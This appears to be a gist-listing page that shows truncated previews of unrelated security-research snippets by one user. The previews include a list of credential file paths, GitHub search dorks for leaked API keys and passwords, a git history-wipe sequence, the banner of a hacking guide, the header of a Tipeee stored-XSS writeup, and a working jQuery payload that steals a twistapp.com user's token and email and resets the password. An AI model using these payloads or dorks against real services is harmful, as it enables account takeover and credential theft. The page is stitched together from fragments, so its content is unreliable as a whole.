toufik-airane

package main

import (
	"bufio"
	"context"
	"flag"
	"fmt"
	"io/ioutil"
	"log"
	"os"

toufik-airane

- "In security, the root of all evil lies in exactly two locations : errors in code and errors in business processes. There is nothing else.
So you either can fix the code and fix the problem, or you can fix the process that puts the error in the code in the first place." Tyler Shields - Signal Sciences

toufik-airane

defaults.env
release.zip
js/config.js
js/credentials.js
js/secrets.js
js/keys.js
js/password.js
js/api_keys.js
js/auth_tokens.js
js/access_tokens.js

toufik-airane

apiVersion: v1
kind: Pod
metadata:
  name: debugpod
spec:
  containers:
    - name: debugpod
      image: nginx

toufik-airane

PSR can be run from the command prompt. Below is a listing of command switches from Microsoft :

psr.exe [/start |/stop][/output <fullfilepath>] [/sc (0|1)] [/maxsc <value>]
[/sketch (0|1)] [/slides (0|1)] [/gui (0|1)]
[/arcetl (0|1)] [/arcxml (0|1)] [/arcmht (0|1)]
[/stopevent <eventname>] [/maxlogsize <value>] [/recordpid <pid>]

/start Start Recording. (Outputpath flag SHOULD be specified)
/stop Stop Recording.
/sc Capture screenshots for recorded steps.

toufik-airane

               | | | | __ _  ___| | __ | __ )  __ _  ___| | _| |
               | |_| |/ _` |/ __| |/ / |  _ \ / _` |/ __| |/ / |
               |  _  | (_| | (__|   <  | |_) | (_| | (__|   <|_|
               |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)

                         Una guía DIY para robar bancos
                        
                        
                                  ^__^
                                  (oo)\_______

toufik-airane

git checkout --orphan orphan
git add -A
git commit -am "Initial commit"
git branch -D main
git branch -m main
git push -f origin main

toufik-airane

https://github.com/search?q=BROWSER_STACK_ACCESS_KEY= OR BROWSER_STACK_USERNAME= OR browserConnectionEnabled= OR BROWSERSTACK_ACCESS_KEY=&s=indexed&type=Code
https://github.com/search?q=CHROME_CLIENT_SECRET= OR CHROME_EXTENSION_ID= OR CHROME_REFRESH_TOKEN= OR CI_DEPLOY_PASSWORD= OR CI_DEPLOY_USER=&s=indexed&type=Code
https://github.com/search?q=CLOUDAMQP_URL= OR CLOUDANT_APPLIANCE_DATABASE= OR CLOUDANT_ARCHIVED_DATABASE= OR CLOUDANT_AUDITED_DATABASE=&s=indexed&type=Code
https://github.com/search?q=CLOUDANT_ORDER_DATABASE= OR CLOUDANT_PARSED_DATABASE= OR CLOUDANT_PASSWORD= OR CLOUDANT_PROCESSED_DATABASE=&s=indexed&type=Code
https://github.com/search?q=CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN= OR CONTENTFUL_TEST_ORG_CMA_TOKEN= OR CONTENTFUL_V2_ACCESS_TOKEN=&s=indexed&type=Code
https://github.com/search?q=-DSELION_BROWSER_RUN_HEADLESS= OR -DSELION_DOWNLOAD_DEPENDENCIES= OR -DSELION_SELENIUM_RUN_LOCALLY=&s=indexed&type=Code
https://github.com/search?q=ELASTICSEARCH_PASSWORD= OR ELASTICSEARCH_USERNAME= OR EMAIL_NOTIFI

toufik-airane

$.get("https://twistapp.com/login", function( data ) {
	var token=data.match(/"token"..(\w+)/);
	var email=data.match(/"email"..([\w.@]+)/);
	var password="newpassword";
	alert("Email: "+email[1]+"\nToken: "+token[1]+"\nPassword: "+password);
	$.get("https://twistapp.com/api/v3/users/update_password?token="+token[1]+"&new_password="+password);
});

toufik-airane

/* ---------------------------------------------------  \
|    Stored Client-Side JavaScript Injection            |
|    In Private Message Lead                            |
|    to Account Take Over on Tipeee                     |
\  ---------------------------------------------------  /
/  ---------------------------------------------------  \
|    Vulnerable HTTP request                            |
|    https://www.tipeee.com/inbox/new-content           |
\  ---------------------------------------------------  /
POST /inbox/new-content HTTP/1.1